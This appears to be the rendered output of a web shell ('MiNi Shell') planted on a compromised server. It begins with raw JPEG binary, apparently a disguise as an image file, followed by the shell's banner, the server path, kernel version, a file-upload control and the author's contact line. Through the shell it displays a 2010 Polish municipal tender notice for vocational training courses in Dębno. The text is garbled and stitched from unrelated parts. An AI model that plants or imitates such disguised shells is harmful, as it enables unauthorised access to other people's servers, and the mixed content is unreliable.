JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100716/212890-N-2010.html

<p class="kh_header"><b>Dębno: Usługi szkoleniowe w ramach projektu WIEDZA = SZANSA Program aktywizacji społecznej i zawodowej w Gminie Dębno.</b><br>
<b>Numer ogłoszenia: 212890 - 2010; data zamieszczenia: 16.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Wola Dębińska 240, 32-852 Dębno, woj. małopolskie, tel. 14 631 85 90, faks 14 6658749.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc Społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe w ramach projektu WIEDZA = SZANSA Program aktywizacji społecznej i zawodowej w Gminie Dębno..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie usług szkoleniowych w zakresie;
                                                      Rok 2010
Część 1.
Kurs prawa jazdy kat. B 
1.	ilość osób do przeszkolenia - 8, 
2.	ilość godz. - 60  na BO
3.	Miejsce organizacji i przeprowadzenia kursów - powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursów - 2010 rok III - IV kwartał

Część  2.
Kurs pieczenia, gotowania i sporządzania zakąsek

1.	ilość osób do przeszkolenia - 7, 
2.	ilość godz.-120 na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursów - powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursów - 2010 rok IV kwartał.

Część  3.
Kurs pierwszej pomocy przedmedycznej

1.	ilość osób do przeszkolenia - 15,  
2.	ilość godz.- 16  na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursów - powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursów - 2010 rok III kwartał.

Część  4.
Warsztaty  z dworactwa zawodowego 
1.	ilość uczestników warsztatów - 15,  
2.	ilość godz.- min. 4 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia warsztatów - woj. małopolskie, szkolenie wyjazdowe, grupowe jednodniowe
4.	Termin przeprowadzenia warsztatów - 2010 rok III kwartał.

Część  5.
Warsztaty  z psychologiem (wspieranie funkcji wychowawczych) 
5.	ilość uczestników warsztatów - 15,  
6.	ilość godz.- min. 4 godz.  na 1 BO
7.	Miejsce organizacji i przeprowadzenia warsztatów -  woj. małopolskie,szkolenie wyjazdowe, grupowe jednodniowe .
8.	Termin przeprowadzenia warsztatów - 2010 rok III kwartał
---------------------------------------------------------------------------------------------------------------------------
                                                     Rok 2011

Część  6.
Kurs murarz, tynkarz
1.	ilość osób do przeszkolenia - 5, 
2.	ilość godz. - min. 160 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursów - powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursów - 2011 rok I - II kwartał.

Część  7.
Kurs kosmetyczka-manicure-pedicure
1.	ilość osób do przeszkolenia - 4, 
2.	ilość godz. - min. 160 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursów - powiat brzeski, woj. małopolskie 
Termin przeprowadzenia kursów - 2011 rok III kwartał.

Część  8.
Kurs pomocy przedmedycznej
1.	ilość osób do przeszkolenia - 25, 
2.	ilość godz. - min. 16 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursów - powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursów - 2011 rok I kwartał.

Część 9.
Kurs spawania metodą  MAG 
1.	ilość osób do przeszkolenia - 5, 
2.	ilość godz. - min. 120 godz. na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursów - powiat brzeski, woj. małopolskie 
Termin przeprowadzenia kursów - 2011 rok II kwartał.

Część  10.
Warsztaty  z doractwa zawodowego 
9.	ilość uczestników warsztatów - 25,  
10.	ilość godz.- min. 4 godz.  na 1 BO
11.	Miejsce organizacji i przeprowadzenia warsztatów - woj. małopolskie, szkolenie wyjazdowe, grupowe jednodniowe.
12.	Termin przeprowadzenia warsztatów - 2011 rok I kwartał.

Część  11.
Warsztaty  z psychologiem (wspieranie funkcji wychowawczych) 
1.	ilość uczestników warsztatów - 25,  
2.	ilość godz.- min. 4 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia warsztatów - w woj. małopolskim, szkolenie wyjazdowe, grupowe jednodniowe. 
4.	Termin przeprowadzenia warsztatów - 2011 rok I kwartał.

Część 12
Kurs barman-kelner
1.	ilość osób do przeszkolenia - 6,  
2.	ilość godz.- min. 120 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursu -  powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursu - 2011 rok, IV kwartał.
5.	
Część 13
Kurs florystyki
1.	ilość osób do przeszkolenia - 5,  
2.	ilość godz.- min. 80 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursu -  powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursu - 2011 rok, III kwartał.

--------------------------------------------------------------------------------------------------------------------------- 
                                                     Rok 2012
Część  14.
Kurs sprzedawca i obsługa kas fiskalnych 

5.	ilość osób do przeszkolenia - 8,  
6.	ilość godz.- min. 70 godz.  na 1 BO
7.	Miejsce organizacji i przeprowadzenia kursu -  powiat brzeski, woj. małopolskie 
8.	Termin przeprowadzenia kursu - 2012 rok II kwartał.

Część 15.
Kurs pomocy przedmedycznej

1.	ilość osób do przeszkolenia - 21,  
2.	ilość godz.- min. 16 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursu -  powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursu - 2012 rok I kwartał.

Część  16.
Kurs obsługi wózków widłowych i wymiany butli gazowych

1.	ilość osób do przeszkolenia - 8.  
2.	ilość godz.- min. 63 godz. na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursu -  powiat brzeski, woj. małopolskie
4.	Termin przeprowadzenia kursu - 2012 rok II kwartał.

Część  17.

Kurs fryzjerski
1.	ilość osób do przeszkolenia - 5.  
2.	ilość godz.- min. 160 godz. na 1 BO
3.	Miejsce organizacji i przeprowadzenia kursu -  powiat brzeski, woj. małopolskie 
4.	Termin przeprowadzenia kursu - 2012 rok II kwartał.

Część  18.
Warsztaty  z dworactwa zawodowego 
1.	ilość uczestników warsztatów - 21,  
2.	ilość godz.- min. 4 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia warsztatów - woj. małopolskie, szkolenie wyjazdowe, grupowe jednodniowe.
4.	Termin przeprowadzenia warsztatów - 2012 rok I kwartał.

Część 19.
Warsztaty  z psychologiem (wspieranie funkcji wychowawczych) 
1.	ilość uczestników warsztatów - 21,  
2.	ilość godz.- min. 4 godz.  na 1 BO
3.	Miejsce organizacji i przeprowadzenia warsztatów - w woj. małopolskim, szkolenie wyjazdowe, grupowe jednodniowe.
4.	Termin przeprowadzenia warsztatów - 2012 rok I kwartał.

Wykonawca będzie zobowiązany do;
1) Zawarcia z ZAMAWIAJĄCYM umowy, której wzór stanowi załącznik nr 7 do SIWZ.
2) Zwrotu kosztów przejazdu z miejsca zamieszkania do miejsca szkolenia i z powrotem
uczestnikom szkolenia mającym miejsce zamieszkania w innej miejscowości niż miejsce
szkolenia zgodnie z imiennym wykazem sporządzonym przez ZAMAWIAJĄCEGO dla
każdej grupy szkoleniowej.
3 Ubezpieczenie beneficjentów ostatecznych od następstw nieszczęśliwych wypadków na czas trwania kursów.
4) Zapewnienia warunków szkolenia zgodnych z przepisami bezpieczeństwa i higieny pracy
5) Prowadzenia dokumentacji przebiegu szkolenia (tj. dziennika zajęć edukacyjnych
zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokółu
z egzaminu wewnętrznego, jeżeli został przeprowadzony, rejestru wydanych
zaświadczeń).
6) Przeprowadzenia szkolenia z zastosowaniem metod i technik nauczania dostosowanych
do tematyki prowadzonych zajęć przez osoby posiadające kwalifikacje i uprawnienia do
przeprowadzania zajęć na szkoleniach z zakresu objętym zamówieniem.
7) Przeprowadzenia zajęć według opracowanego planu nauczania. Łączny czas zajęć w ciągu jednego dnia nie może przekroczyć 8 godzin. Zajęcia powinny odbywać się w godzinach 7:00 - 16:00.
8) Zorganizowanie bezpośrednio po szkoleniu egzaminów umożliwiających uzyskanie
każdemu z uczestników szkolenia świadectwa egzaminu.
9) Dostarczenia uczestnikom szkolenia materiałów szkoleniowych.
10) Zakończenia szkolenia oceną nabytych umiejętności (poprzez wypełnienie przez
uczestników szkolenia ankiet, których wzory zostaną dostarczone wybranemu
WYKONAWCY) i wydania zaświadczenia o jego ukończeniu zgodnie
z obowiązującymi przepisami oraz świadectwa egzaminu.
11) Dostarczenia ZAMAWIAJĄCEMU potwierdzonych za zgodność z oryginałem
kserokopii zaświadczeń o ukończeniu szkolenia oraz świadectw egzaminu.
12) Zapewnienie przez WYKONAWCĘ cateringu (zestaw obiadowy, kawa, herbata, napoje, ciastka), dla uczestników szkoleń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	w zakresie posiadania uprawnień do wykonywania określonej działalności zamawiający wymaga aby wykonawca przedłożył aktualne zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę Wykonawcy.Ocena polega na sprawdzeniu; czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo,czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny, Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk ZP-17 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	w zakresie wymaganego doświadczenia zamawiający wymaga aby wykonawca wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej dwóch zamówień odpowiadających swoim rodzajem i wartością usługom stanowiących przedmiot niniejszego zamówienia. Zamówienie odpowiadające rodzajem i wartością przedmiotowego zamówieniu, zamawiający uznaje wykonanie usług szkoleniowych w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dla co najmniej 10 osób i wartości co najmniej 30 000,00 zł brutto każde. Ocena polega m.in. na sprawdzeniu; czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny, Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk ZP-17 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	w zakresie dysponowania osobami zdolnymi do wykonania zamówienia zamawiający wymaga posiadania przez Wykonawcę co najmniej jednej osoby dla każdego rodzaju kursu lub szkolenia posiadającej wykształcenie i uprawnienia do prowadzenia szkoleń z zakresu objętym niniejszym zamówieniem zgodnie z obowiązującym prawem i przepisami w tym zakresie.Ocena polega m.in. na sprawdzeniu; czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny, Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk ZP-17 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	w zakresie wymaganej zdolności finansowej, zamawiający wymaga posiadania przez wykonawcę opłaconej polisy, a w przypadku jej braku inny dokumentu potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.Ocena polega m.in. na sprawdzeniu; czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny, Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk ZP-17 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Program szkolenia - 20</li>
<li>3 - Warunki lokalowe, sprzęt oraz środki i materiały dydaktyczne - 20</li>
<li>4 - Posiadanie certyfikatów jakości usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminadebno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej Wola Dębińska 240 32-852 Dębno, pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 12:00, miejsce: Gminny Ośrodek Pomocy Społecznej Wola Dębińska 240 32-852 Dębno w Punkcie Obsługi Klienta Urzędu Gminy Dębno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com